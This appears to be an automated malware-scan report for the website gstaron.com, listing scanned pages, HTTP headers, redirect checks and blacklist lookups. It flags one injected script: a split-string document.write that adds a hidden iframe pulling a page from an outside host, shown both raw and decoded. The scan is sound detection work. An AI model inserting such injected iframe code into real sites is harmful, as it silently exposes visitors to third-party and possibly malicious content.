Scanned pages/files
| Request | Server response | Status |
http://gstaron.com/ | 200 OK Content-Length: 137722 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. document.write("<IFR"+"AME src=http://xfind.co.kr/xgb/ad_banner2.php?member=test1 frameBorder=0 width=166 height=105 scrolling=no></IFR"+"AME>"); Decoded script: <iframe src=http://xfind.co.kr/xgb/ad_banner2.php?member=test1 frameBorder=0 width=166 height=105 scrolling=no></iframe> | ||
http://gstaron.com/js/jquery.tools.min.js | 200 OK Content-Length: 12884 Content-Type: application/x-javascript | clean |
http://gstaron.com/js/newsticker.js | 200 OK Content-Length: 2674 Content-Type: application/x-javascript | clean |
http://gstaron.com/./js/wrest.js | 200 OK Content-Length: 10546 Content-Type: application/x-javascript | clean |
http://gstaron.com/./bbs/board.php?bo_table=chunchoo | 200 OK Content-Length: 85226 Content-Type: text/html | clean |
https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit | 200 OK Content-Length: 1475 Content-Type: text/javascript | clean |
http://gstaron.com/./bbs/../js/sideview.js | 200 OK Content-Length: 11274 Content-Type: application/x-javascript | clean |
http://gstaron.com/./bbs/../js/wrest.js | 200 OK Content-Length: 10546 Content-Type: application/x-javascript | clean |
http://gstaron.com/./bbs/../bbs/board.php?bo_table=002_01 | 200 OK Content-Length: 132895 Content-Type: text/html | clean |
http://gstaron.com/./bbs/../bbs/../js/sideview.js | 200 OK Content-Length: 11274 Content-Type: application/x-javascript | clean |
http://gstaron.com/./bbs/../bbs/../js/wrest.js | 200 OK Content-Length: 10546 Content-Type: application/x-javascript | clean |
http://gstaron.com/./bbs/../bbs/../bbs/board.php?bo_table=002_01 | 200 OK Content-Length: 132906 Content-Type: text/html | clean |
http://gstaron.com/./bbs/../bbs/../bbs/../js/sideview.js | 200 OK Content-Length: 11274 Content-Type: application/x-javascript | clean |
http://gstaron.com/./bbs/../bbs/../bbs/../js/wrest.js | 200 OK Content-Length: 10546 Content-Type: application/x-javascript | clean |
http://gstaron.com/./bbs/../bbs/../bbs/../bbs/board.php?bo_table=002_01 | 200 OK Content-Length: 132917 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gstaron.com
Result:
HTTP/1.1 200 OK
Cache-Control: pre-check=0, post-check=0, max-age=0
Connection: close
Date: Sat, 03 May 2014 18:20:37 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=utf-8
Expires: 0
Last-Modified: Sat, 03 May 2014 18:20:37 GMT
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Set-Cookie: PHPSESSID=d63u1jkblcsbloc0d2uvjhv8j7; path=/
Set-Cookie: f33d2ed86bd82d4c22123c9da444d8ab=MTM5OTE0MTIzNw%3D%3D; expires=Sun, 03-May-2015 18:20:37 GMT; path=/
Set-Cookie: 96b28b766b7e0699aa91c9ff3d890663=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: 2a0d2363701f23f8a75028924a3af643=NzguMTU4LjExLjIyNg%3D%3D; expires=Sun, 04-May-2014 18:20:37 GMT; path=/
X-Powered-By: PHP/5.3.22
GET / HTTP/1.1
Host: gstaron.com
Result:
HTTP/1.1 200 OK
Cache-Control: pre-check=0, post-check=0, max-age=0
Connection: close
Date: Sat, 03 May 2014 18:20:37 GMT
Pragma: no-cache
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=utf-8
Expires: 0
Last-Modified: Sat, 03 May 2014 18:20:37 GMT
P3P: CP="ALL CURa ADMa DEVa TAIa OUR BUS IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC"
Set-Cookie: PHPSESSID=d63u1jkblcsbloc0d2uvjhv8j7; path=/
Set-Cookie: f33d2ed86bd82d4c22123c9da444d8ab=MTM5OTE0MTIzNw%3D%3D; expires=Sun, 03-May-2015 18:20:37 GMT; path=/
Set-Cookie: 96b28b766b7e0699aa91c9ff3d890663=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: 2a0d2363701f23f8a75028924a3af643=NzguMTU4LjExLjIyNg%3D%3D; expires=Sun, 04-May-2014 18:20:37 GMT; path=/
X-Powered-By: PHP/5.3.22
Second query (visit from search engine):
GET / HTTP/1.1
Host: gstaron.com
Referer: http://www.google.com/search?q=gstaron.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gstaron.com
Referer: http://www.google.com/search?q=gstaron.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gstaron.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gstaron.com/
Result: gstaron.com is not infected or malware details are not published yet.
Result: gstaron.com is not infected or malware details are not published yet.